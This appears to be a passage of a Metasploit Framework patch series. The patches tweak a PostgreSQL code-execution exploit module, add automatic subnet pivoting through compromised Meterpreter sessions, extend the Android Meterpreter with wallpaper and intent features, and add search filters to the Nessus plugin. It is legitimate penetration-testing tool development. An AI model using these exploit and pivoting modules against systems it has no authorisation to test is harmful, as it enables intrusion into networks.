b/modules/exploits/multi/postgres/postgres_createlang.rb index 36455744c6..9aee4b2548 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -53,7 +53,7 @@ class Metasploit4 < Msf::Exploit::Remote register_options([ OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), OptString.new('PASSWORD', [true, 'The password to the service', 'postgres']) - ], self.class) + ]) deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') end @@ -69,13 +69,13 @@ class Metasploit4 < Msf::Exploit::Remote return CheckCode::Appears else - print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}" + print_error "#{peer} - Unsupported version - #{version[:auth]}" return CheckCode::Safe end else - print_error "#{rhost}:#{rport} - Authentication failed" - return CheckCode::Safe + print_error "#{peer} - Authentication failed" + return CheckCode::Unknown end end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Exploit::Remote elsif major_version.to_i >= 9 print_status "#{rhost}:#{rport} - Selecting version 9 attack" - extension = 'LANGUAGE' + extension = 'EXTENSION' else print_error "#{rhost}:#{rport} - Unsupported version - #{version}" @@ -129,17 +129,17 @@ class Metasploit4 < Msf::Exploit::Remote case load_lang when :exists - print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing" + print_good "#{rhost}:#{rport} - language is already loaded, continuing" create_function(language, func_name) loaded = true when :loaded - print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing" + print_good "#{rhost}:#{rport} - language was successfully loaded, continuing" create_function(language, func_name) loaded = true when :not_exists - print_status "#{rhost}:#{rport} - #{human_language} could not be loaded" + print_status "#{rhost}:#{rport} - language could not be loaded" else print_error "#{rhost}:#{rport} - Error occurred" @@ -171,9 +171,6 @@ class Metasploit4 < Msf::Exploit::Remote print_error "#{rhost}:#{rport} - Exploit failed" return false end - - rescue RuntimeError => e - print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}" end postgres_logout if @postgres_conn @@ -251,7 +248,7 @@ class Metasploit4 < Msf::Exploit::Remote return :noauth end - rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError + rescue Rex::ConnectionError return :noconn end end From 3abb6feb3f850decd99a622607e2c6a658ab9865 Mon Sep 17 00:00:00 2001 From: Josh Hale Date: Fri, 29 Jan 2016 21:34:22 -0600 Subject: [PATCH 244/686] Add autoadd feature to autoroute.rb --- modules/post/windows/manage/autoroute.rb | 31 +++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index a894ae01d3..f76b246c46 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Post [ OptString.new('SUBNET', [false, 'Subnet (IPv4, for example, 10.10.10.0)', nil]), OptString.new('NETMASK', [false, 'Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"', '255.255.255.0']), - OptEnum.new('CMD', [true, 'Specify the autoroute command', 'add', ['add','print','delete']]) + OptEnum.new('CMD', [true, 'Specify the autoroute command', 'autoadd', ['add','autoadd','print','delete']]) ], self.class) end @@ -58,6 +58,8 @@ class Metasploit3 < Msf::Post print_status("Adding a route to %s/%s..." % [datastore['SUBNET'],netmask]) add_route(:subnet => datastore['SUBNET'], :netmask => netmask) end + when :autoadd + autoadd_routes when :delete if datastore['SUBNET'] print_status("Deleting route to %s/%s..." % [datastore['SUBNET'],netmask]) @@ -156,6 +158,33 @@ class Metasploit3 < Msf::Post Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session) end + # This function will search for valid subnets on the target and attempt + # add a route to each. (Operation from auto_add_route plugin.) + # + # @return [void] A useful return value is not expected here + def autoadd_routes + switch_board = Rex::Socket::SwitchBoard.instance + print_status("Searcing for subnets to auto route.") + session.net.config.each_route do | route | + # Remove multicast and loopback interfaces + next if route.subnet =~ /^(224\.|127\.)/ + next if route.subnet == '0.0.0.0' + next if route.netmask == '255.255.255.255' + + if not switch_board.route_exists?(route.subnet, route.netmask) + begin + if Rex::Socket::SwitchBoard.add_route(route.subnet, route.netmask, session) + print_good("Route added to subnet #{route.subnet}/#{route.netmask}") + else + print_error("Could not add route to subnet #{route.subnet}/#{route.netmask}") + end + rescue ::Rex::Post::Meterpreter::RequestError => error + print_error("Could not add route to subnet #{route.subnet}/(#{route.netmask})") + print_error(error.to_s) + end + end + end + end # Validates the command options def validate_cmd(subnet=nil,netmask=nil) From 413ea53984900ae3f255e7dfe906304b17f01950 Mon Sep 17 00:00:00 2001 From: Josh Hale Date: Sat, 30 Jan 2016 14:31:45 -0600 Subject: [PATCH 245/686] Add found flag and touchup code --- modules/post/windows/manage/autoroute.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index f76b246c46..941cf4f945 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -164,17 +164,20 @@ class Metasploit3 < Msf::Post # @return [void] A useful return value is not expected here def autoadd_routes switch_board = Rex::Socket::SwitchBoard.instance - print_status("Searcing for subnets to auto route.") + print_status("Searcing for subnets to autoroute.") + found = false + session.net.config.each_route do | route | # Remove multicast and loopback interfaces next if route.subnet =~ /^(224\.|127\.)/ next if route.subnet == '0.0.0.0' next if route.netmask == '255.255.255.255' - if not switch_board.route_exists?(route.subnet, route.netmask) + if !switch_board.route_exists?(route.subnet, route.netmask) begin if Rex::Socket::SwitchBoard.add_route(route.subnet, route.netmask, session) print_good("Route added to subnet #{route.subnet}/#{route.netmask}") + found = true else print_error("Could not add route to subnet #{route.subnet}/#{route.netmask}") end @@ -184,6 +187,7 @@ class Metasploit3 < Msf::Post end end end + print_status("Did not find any new subnets to add.") if !found end # Validates the command options From 3d4b7af6bb098dc1239e0b3d00aafd196ef8842c Mon Sep 17 00:00:00 2001 From: Josh Hale Date: Sat, 30 Jan 2016 14:35:03 -0600 Subject: [PATCH 246/686] Update description --- modules/post/windows/manage/autoroute.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 941cf4f945..8c686c38cd 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -15,7 +15,8 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Network Route via Meterpreter Session', 'Description' => %q{This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a - compromised host when connecting to the named NETWORK and SUBMASK.}, + compromised host when connecting to the named NETWORK and SUBMASK. + Autoadd will search session for valid subnets and route to them.}, 'License' => MSF_LICENSE, 'Author' => [ 'todb'], 'Platform' => [ 'win' ], From 4d6791d4323ab3593e725b77f857b6c72f9eed40 Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 31 Jan 2016 15:13:21 +0000 Subject: [PATCH 247/686] fix returning of error --- lib/rex/post/meterpreter/extensions/android/android.rb | 6 +++++- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + .../meterpreter/ui/console/command_dispatcher/android.rb | 7 ++++++- 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 32cc0f9af7..800204d726 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -246,7 +246,11 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + return nil + else + return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value + end end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 54cfa1488b..babbec853a 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -78,6 +78,7 @@ TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) +TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index d72044d9ec..4c6e39e4f4 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -538,7 +538,12 @@ class Console::CommandDispatcher::Android end uri = args[0] - client.android.activity_start(uri) + result = client.android.activity_start(uri) + if result.nil? + print_status("Intent started") + else + print_error("Error: #{result}") + end end # From 96ab598835c73695ac5d01c59a274179d520e4c1 Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 1 Feb 2016 01:01:24 +0000 Subject: [PATCH 248/686] set wallpaper --- modules/post/multi/manage/set_wallpaper.rb | 97 ++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 modules/post/multi/manage/set_wallpaper.rb diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb new file mode 100644 index 0000000000..9a6035fe81 --- /dev/null +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Multi Manage Set Wallpaper', + 'Description' => %q{ + This module will sets the desktop wallpaper background on the specified session + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'timwr'], + 'Platform' => [ 'win', 'osx', 'linux' ], + 'SessionTypes' => [ 'shell', 'meterpreter' ] + )) + + register_options( + [ + OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set']) + ], self.class) + end + + # + # The OSX version uses an apple script to do this + # + def osx_set_wallpaper + remote_file = upload_wallpaper("/tmp/") + script = %Q|osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"' | + begin + cmd_exec(script) + rescue EOFError + return false + end + true + end + + # + # The Windows version uses the SystemParametersInfo + # + def win_set_wallpaper(id) + remote_file = upload_wallpaper("%TEMP%\\") + client.railgun.user32.SystemParametersInfoA(0x0014,nil,remote_file,0x2) + + #target_key = "HKEY_CURRENT_USER\\Control Panel\\Desktop" + #registry_createkey(target_key) + #registry_setvaldata(target_key, "Wallpaper", remotefile, 'REG_SZ') + true + end + + def upload_wallpaper(tempdir) + wallpaper_file = datastore["WALLPAPER_FILE"] + remote_file = "#{tempdir}#{File.basename(wallpaper_file)}" + print_status("#{peer} - Uploading to #{remote_file}") + localfile = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } + write_file(remote_file, localfile) + print_status("#{peer} - Uploaded to #{remote_file}") + remote_file + end + + def android_set_wallpaper(id) + true + end + + def set_wallpaper(id) + case session.platform + when /osx/ + osx_set_wallpaper(id) + when /win/ + win_set_wallpaper(id) + when /android/ + android_set_wallpaper(id) + else + remote_file = upload_wallpaper("/tmp/") + cmd_exec("gsettings set org.gnome.desktop.background picture-uri file://#{remote_file}") + end + end + + def run + file = datastore['WALLPAPER_FILE'] + if set_wallpaper(file) + print_good("#{peer} - The video has started") + else + print_error("#{peer} - Unable to start the video") + return + end + + end + +end From d544bf9311549a3de173a51eb4e471df93becee9 Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 1 Feb 2016 01:16:17 +0000 Subject: [PATCH 249/686] android set wallpaper --- lib/rex/post/meterpreter/extensions/android/android.rb | 6 ++++++ lib/rex/post/meterpreter/extensions/android/tlv.rb | 3 +-- modules/post/multi/manage/set_wallpaper.rb | 3 +++ 3 files changed, 10 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..f559db9f59 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -242,6 +242,12 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def set_wallpaper(data) + request = Packet.create_request('set_wallpaper') + request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data) + response = client.send_request(request) + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..07125aafef 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -76,8 +76,7 @@ TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) - - +TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201) end end diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index 9a6035fe81..8e477a1a42 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -66,6 +66,9 @@ class Metasploit3 < Msf::Post end def android_set_wallpaper(id) + wallpaper_file = datastore["WALLPAPER_FILE"] + local_file = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } + client.android.set_wallpaper(local_file) true end From 4992c5c3c5c42167a5d94d3e3b095fd4562ffc0e Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sun, 31 Jan 2016 22:11:20 -0500 Subject: [PATCH 250/686] Nessus plugin - add search to relevant commands Utilize the SearchTerm param in Rex' Tables to filter scrolling outputs. Clean up argument parsing (implement one of the MSF standards). Update help commands to reflect changes Testing: basic functional tests only so far --- plugins/nessus.rb | 737 +++++++++++++++++++++++++++------------------- 1 file changed, 435 insertions(+), 302 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 99195b7cf0..93490df90e 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -36,10 +36,6 @@ module Msf "#{Msf::Config.local_directory}" end - def cmd_nessus_index - nessus_index - end - def commands { "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port ", @@ -84,75 +80,6 @@ module Msf } end - def cmd_nessus_help(*args) - tbl = Rex::Ui::Text::Table.new( - 'Columns' => [ - "Command", - "Help Text" - ], - 'SortIndex' => -1 - ) - tbl << [ "Generic Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_connect", "Connect to a Nessus server" ] - tbl << [ "nessus_logout", "Logout from the Nessus server" ] - tbl << [ "nessus_login", "Login into the connected Nesssus server with a different username and password"] - tbl << [ "nessus_save", "Save credentials of the logged in user to nessus.yml"] - tbl << [ "nessus_help", "Listing of available nessus commands" ] - tbl << [ "nessus_server_properties", "Nessus server properties such as feed type, version, plugin set and server UUID." ] - tbl << [ "nessus_server_status", "Check the status of your Nessus Server" ] - tbl << [ "nessus_admin", "Checks if user is an admin" ] - tbl << [ "nessus_template_list", "List scan or policy templates" ] - tbl << [ "nessus_folder_list", "List all configured folders on the Nessus server" ] - tbl << [ "nessus_scanner_list", "List all the scanners configured on the Nessus server" ] - tbl << [ "Nessus Database Commands", "" ] - tbl << [ "-----------------", "-----------------" ] - tbl << [ "nessus_db_scan", "Create a scan of all IP addresses in db_hosts" ] - tbl << [ "nessus_db_import", "Import Nessus scan to the Metasploit connected database" ] - tbl << [ "", ""] - tbl << [ "Reports Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_report_hosts", "Get list of hosts from a report" ] - tbl << [ "nessus_report_vulns", "Get list of vulns from a report" ] - tbl << [ "nessus_report_host_details", "Get detailed information from a report item on a host" ] - tbl << [ "", ""] - tbl << [ "Scan Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_scan_list", "List of all current Nessus scans" ] - tbl << [ "nessus_scan_new", "Create a new Nessus Scan" ] - tbl << [ "nessus_scan_launch", "Launch a newly created scan. New scans need to be manually launched through this command" ] - tbl << [ "nessus_scan_pause", "Pause a running Nessus scan" ] - tbl << [ "nessus_scan_pause_all", "Pause all running Nessus scans" ] - tbl << [ "nessus_scan_stop", "Stop a running or paused Nessus scan" ] - tbl << [ "nessus_scan_stop_all", "Stop all running or paused Nessus scans" ] - tbl << [ "nessus_scan_resume", "Resume a pasued Nessus scan" ] - tbl << [ "nessus_scan_resume_all", "Resume all paused Nessus scans" ] - tbl << [ "nessus_scan_details", "Return detailed information of a given scan" ] - tbl << [ "nessus_scan_export", "Export a scan result in either Nessus, HTML, PDF, CSV, or DB format" ] - tbl << [ "nessus_scan_export_status", "Check the status of an exported scan" ] - tbl << [ "", ""] - tbl << [ "Plugin Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_plugin_list", "List all plugins in a particular plugin family." ] - tbl << [ "nessus_family_list", "List all the plugin families along with their corresponding family IDs and plugin count." ] - tbl << [ "nessus_plugin_details", "List details of a particular plugin" ] - tbl << [ "", ""] - tbl << [ "User Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_user_list", "Show Nessus Users" ] - tbl << [ "nessus_user_add", "Add a new Nessus User" ] - tbl << [ "nessus_user_del", "Delete a Nessus User" ] - tbl << [ "nessus_user_passwd", "Change Nessus Users Password" ] - tbl << [ "", ""] - tbl << [ "Policy Commands", "" ] - tbl << [ "-----------------", "-----------------"] - tbl << [ "nessus_policy_list", "List all polciies" ] - tbl << [ "nessus_policy_del", "Delete a policy" ] - print_line "" - print_line tbl.to_s - print_line "" - end - def ncusage print_status("%redYou must do this before any other commands.%clr") print_status("Usage: ") @@ -223,6 +150,24 @@ module Msf end end + def nessus_login + if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) + print_status("You need to connect to a server first.") + ncusage + return + end + @url = "https://#{@host}:#{@port}/" + print_status("Connecting to #{@url} as #{@user}") + @n = Nessus::Client.new(@url, @user, @pass,@sslv) + if @n.authenticated + print_status("User #{@user} authenticated successfully.") + @token = 1 + else + print_error("Error connecting/logging to the server!") + return + end + end + def nessus_verify_token if @token.nil? or @token == '' ncusage @@ -231,6 +176,132 @@ module Msf true end + def valid_policy(*args) + case args.length + when 1 + pid = args[0] + else + print_error("No Policy ID supplied.") + return + end + pol = @n.list_policies + pol["policies"].each { |p| + if p["template_uuid"] == pid + return true + end + } + return false + end + + def nessus_verify_db + if !(framework.db and framework.db.active) + print_error("No database has been configured, please use db_create/db_connect first") + return false + end + true + end + + def check_scan(*args) + case args.length + when 1 + scan_id = args[0] + else + print_error("No scan ID supplied") + return + end + scans = @n.scan_list + scans.each { |scan| + if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" + return true + end + } + return false + end + + def is_scan_complete(scan_id) + complete = false + status = @n.scan_list + status["scans"].each { |scan| + if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") + complete = true + end + } + complete + end + + def cmd_nessus_help(*args) + tbl = Rex::Ui::Text::Table.new( + 'Columns' => [ + "Command", + "Help Text" + ], + 'SortIndex' => -1 + ) + tbl << [ "Generic Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_connect", "Connect to a Nessus server" ] + tbl << [ "nessus_logout", "Logout from the Nessus server" ] + tbl << [ "nessus_login", "Login into the connected Nesssus server with a different username and password"] + tbl << [ "nessus_save", "Save credentials of the logged in user to nessus.yml"] + tbl << [ "nessus_help", "Listing of available nessus commands" ] + tbl << [ "nessus_server_properties", "Nessus server properties such as feed type, version, plugin set and server UUID." ] + tbl << [ "nessus_server_status", "Check the status of your Nessus Server" ] + tbl << [ "nessus_admin", "Checks if user is an admin" ] + tbl << [ "nessus_template_list", "List scan or policy templates" ] + tbl << [ "nessus_folder_list", "List all configured folders on the Nessus server" ] + tbl << [ "nessus_scanner_list", "List all the scanners configured on the Nessus server" ] + tbl << [ "Nessus Database Commands", "" ] + tbl << [ "-----------------", "-----------------" ] + tbl << [ "nessus_db_scan", "Create a scan of all IP addresses in db_hosts" ] + tbl << [ "nessus_db_import", "Import Nessus scan to the Metasploit connected database" ] + tbl << [ "", ""] + tbl << [ "Reports Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_report_hosts", "Get list of hosts from a report" ] + tbl << [ "nessus_report_vulns", "Get list of vulns from a report" ] + tbl << [ "nessus_report_host_details", "Get detailed information from a report item on a host" ] + tbl << [ "", ""] + tbl << [ "Scan Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_scan_list", "List of all current Nessus scans" ] + tbl << [ "nessus_scan_new", "Create a new Nessus Scan" ] + tbl << [ "nessus_scan_launch", "Launch a newly created scan. New scans need to be manually launched through this command" ] + tbl << [ "nessus_scan_pause", "Pause a running Nessus scan" ] + tbl << [ "nessus_scan_pause_all", "Pause all running Nessus scans" ] + tbl << [ "nessus_scan_stop", "Stop a running or paused Nessus scan" ] + tbl << [ "nessus_scan_stop_all", "Stop all running or paused Nessus scans" ] + tbl << [ "nessus_scan_resume", "Resume a pasued Nessus scan" ] + tbl << [ "nessus_scan_resume_all", "Resume all paused Nessus scans" ] + tbl << [ "nessus_scan_details", "Return detailed information of a given scan" ] + tbl << [ "nessus_scan_export", "Export a scan result in either Nessus, HTML, PDF, CSV, or DB format" ] + tbl << [ "nessus_scan_export_status", "Check the status of an exported scan" ] + tbl << [ "", ""] + tbl << [ "Plugin Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_plugin_list", "List all plugins in a particular plugin family." ] + tbl << [ "nessus_family_list", "List all the plugin families along with their corresponding family IDs and plugin count." ] + tbl << [ "nessus_plugin_details", "List details of a particular plugin" ] + tbl << [ "", ""] + tbl << [ "User Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_user_list", "Show Nessus Users" ] + tbl << [ "nessus_user_add", "Add a new Nessus User" ] + tbl << [ "nessus_user_del", "Delete a Nessus User" ] + tbl << [ "nessus_user_passwd", "Change Nessus Users Password" ] + tbl << [ "", ""] + tbl << [ "Policy Commands", "" ] + tbl << [ "-----------------", "-----------------"] + tbl << [ "nessus_policy_list", "List all polciies" ] + tbl << [ "nessus_policy_del", "Delete a policy" ] + print_line "" + print_line tbl.to_s + print_line "" + end + + def cmd_nessus_index + nessus_index + end + def cmd_nessus_connect(*args) # Check if config file exists and load it if !args[0] @@ -326,24 +397,6 @@ module Msf return end - def nessus_login - if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("You need to connect to a server first.") - ncusage - return - end - @url = "https://#{@host}:#{@port}/" - print_status("Connecting to #{@url} as #{@user}") - @n = Nessus::Client.new(@url, @user, @pass,@sslv) - if @n.authenticated - print_status("User #{@user} authenticated successfully.") - @token = 1 - else - print_error("Error connecting/logging to the server!") - return - end - end - def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -370,15 +423,23 @@ module Msf end def cmd_nessus_server_properties(*args) - if args[0] == "-h" - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed") - print_status() - print_status("Returns information about the feed type and server version.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_feed") + print_status("Example:> nessus_server_feed -S searchterm") + print_status() + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + resp = @n.server_properties tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Feed', 'Type', @@ -392,14 +453,22 @@ module Msf end def cmd_nessus_server_status(*args) - if args[0] == "-h" - print_status("nessus_server_status") - print_status("Example:> nessus_server_status") - print_status() - print_status("Returns some status items for the server..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_status") + print_status("Example:> nessus_server_status -S searchterm") + print_status() + print_status("Returns some status items for the server..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Status', 'Progress' @@ -410,13 +479,19 @@ module Msf end def cmd_nessus_admin(*args) + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_admin") + print_status("Example:> nessus_admin") + print_status() + print_status("Checks to see if the current user is an admin") + print_status("Use nessus_user_list to list all users") + return + end + end if args[0] == "-h" - print_status("nessus_admin") - print_status("Example:> nessus_admin") - print_status() - print_status("Checks to see if the current user is an admin") - print_status("Use nessus_user_list to list all users") - return + end if !nessus_verify_token return @@ -429,15 +504,22 @@ module Msf end def cmd_nessus_template_list(*args) - if args[0] == "-h" - print_status("nessus_template_list | ") - print_status("Example:> nessus_template_list scan") - print_status("OR") - print_status("nessus_template_list policy") - print_status() - print_status("Returns a list of information about the scan or policy templates..") - return - end + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_template_list | ") + print_status("Example:> nessus_template_list scan -S searchterm") + print_status("OR") + print_status("nessus_template_list policy") + print_status() + print_status("Returns a list of information about the scan or policy templates..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end + if !nessus_verify_token return end @@ -465,11 +547,12 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Name', 'Title', 'Description', - 'Subscription Only', + 'Subscription Only', 'Cloud Only' ]) list["templates"].each { |template| @@ -479,12 +562,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_folder_list + def cmd_nessus_folder_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end list = @n.list_folders tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -497,7 +588,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_scanner_list + def cmd_nessus_scanner_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scanner_list") + print_status("Example:> nessus_scanner_list -S searchterm") + print_status() + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end @@ -506,6 +610,7 @@ module Msf end list = @n.list_scanners tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -520,40 +625,31 @@ module Msf print_line tbl.to_s end - def check_scan(*args) - case args.length - when 1 - scan_id = args[0] - else - print_error("No scan ID supplied") - return - end - scans = @n.scan_list - scans.each { |scan| - if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" - return true - end - } - return false - end - def cmd_nessus_report_hosts(*args) - if args[0] == "-h" - print_status("nessus_report_hosts ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_hosts -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id - else + + if scan_id.nil? print_status("Usage: ") - print_status("nessus_report_hosts ") + print_status("nessus_report_hosts -S searchterm") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -576,22 +672,28 @@ module Msf end def cmd_nessus_report_vulns(*args) - if args[0] == "-h" - print_status("nessus_report_vulns ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_vulns -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id.to_i - else + if scan_id.nil? print_status("Usage: ") print_status("nessus_report_vulns ") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -613,21 +715,29 @@ module Msf end def cmd_nessus_report_host_details(*args) - if args[0] == "-h" - print_status("nessus_report_host_details ") - print_status("Example:> nessus_report_host_details 10 5") - print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") - print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") - return - end - if !nessus_verify_token - return - end - case args.length - when 2 - scan_id = args[0] - host_id = 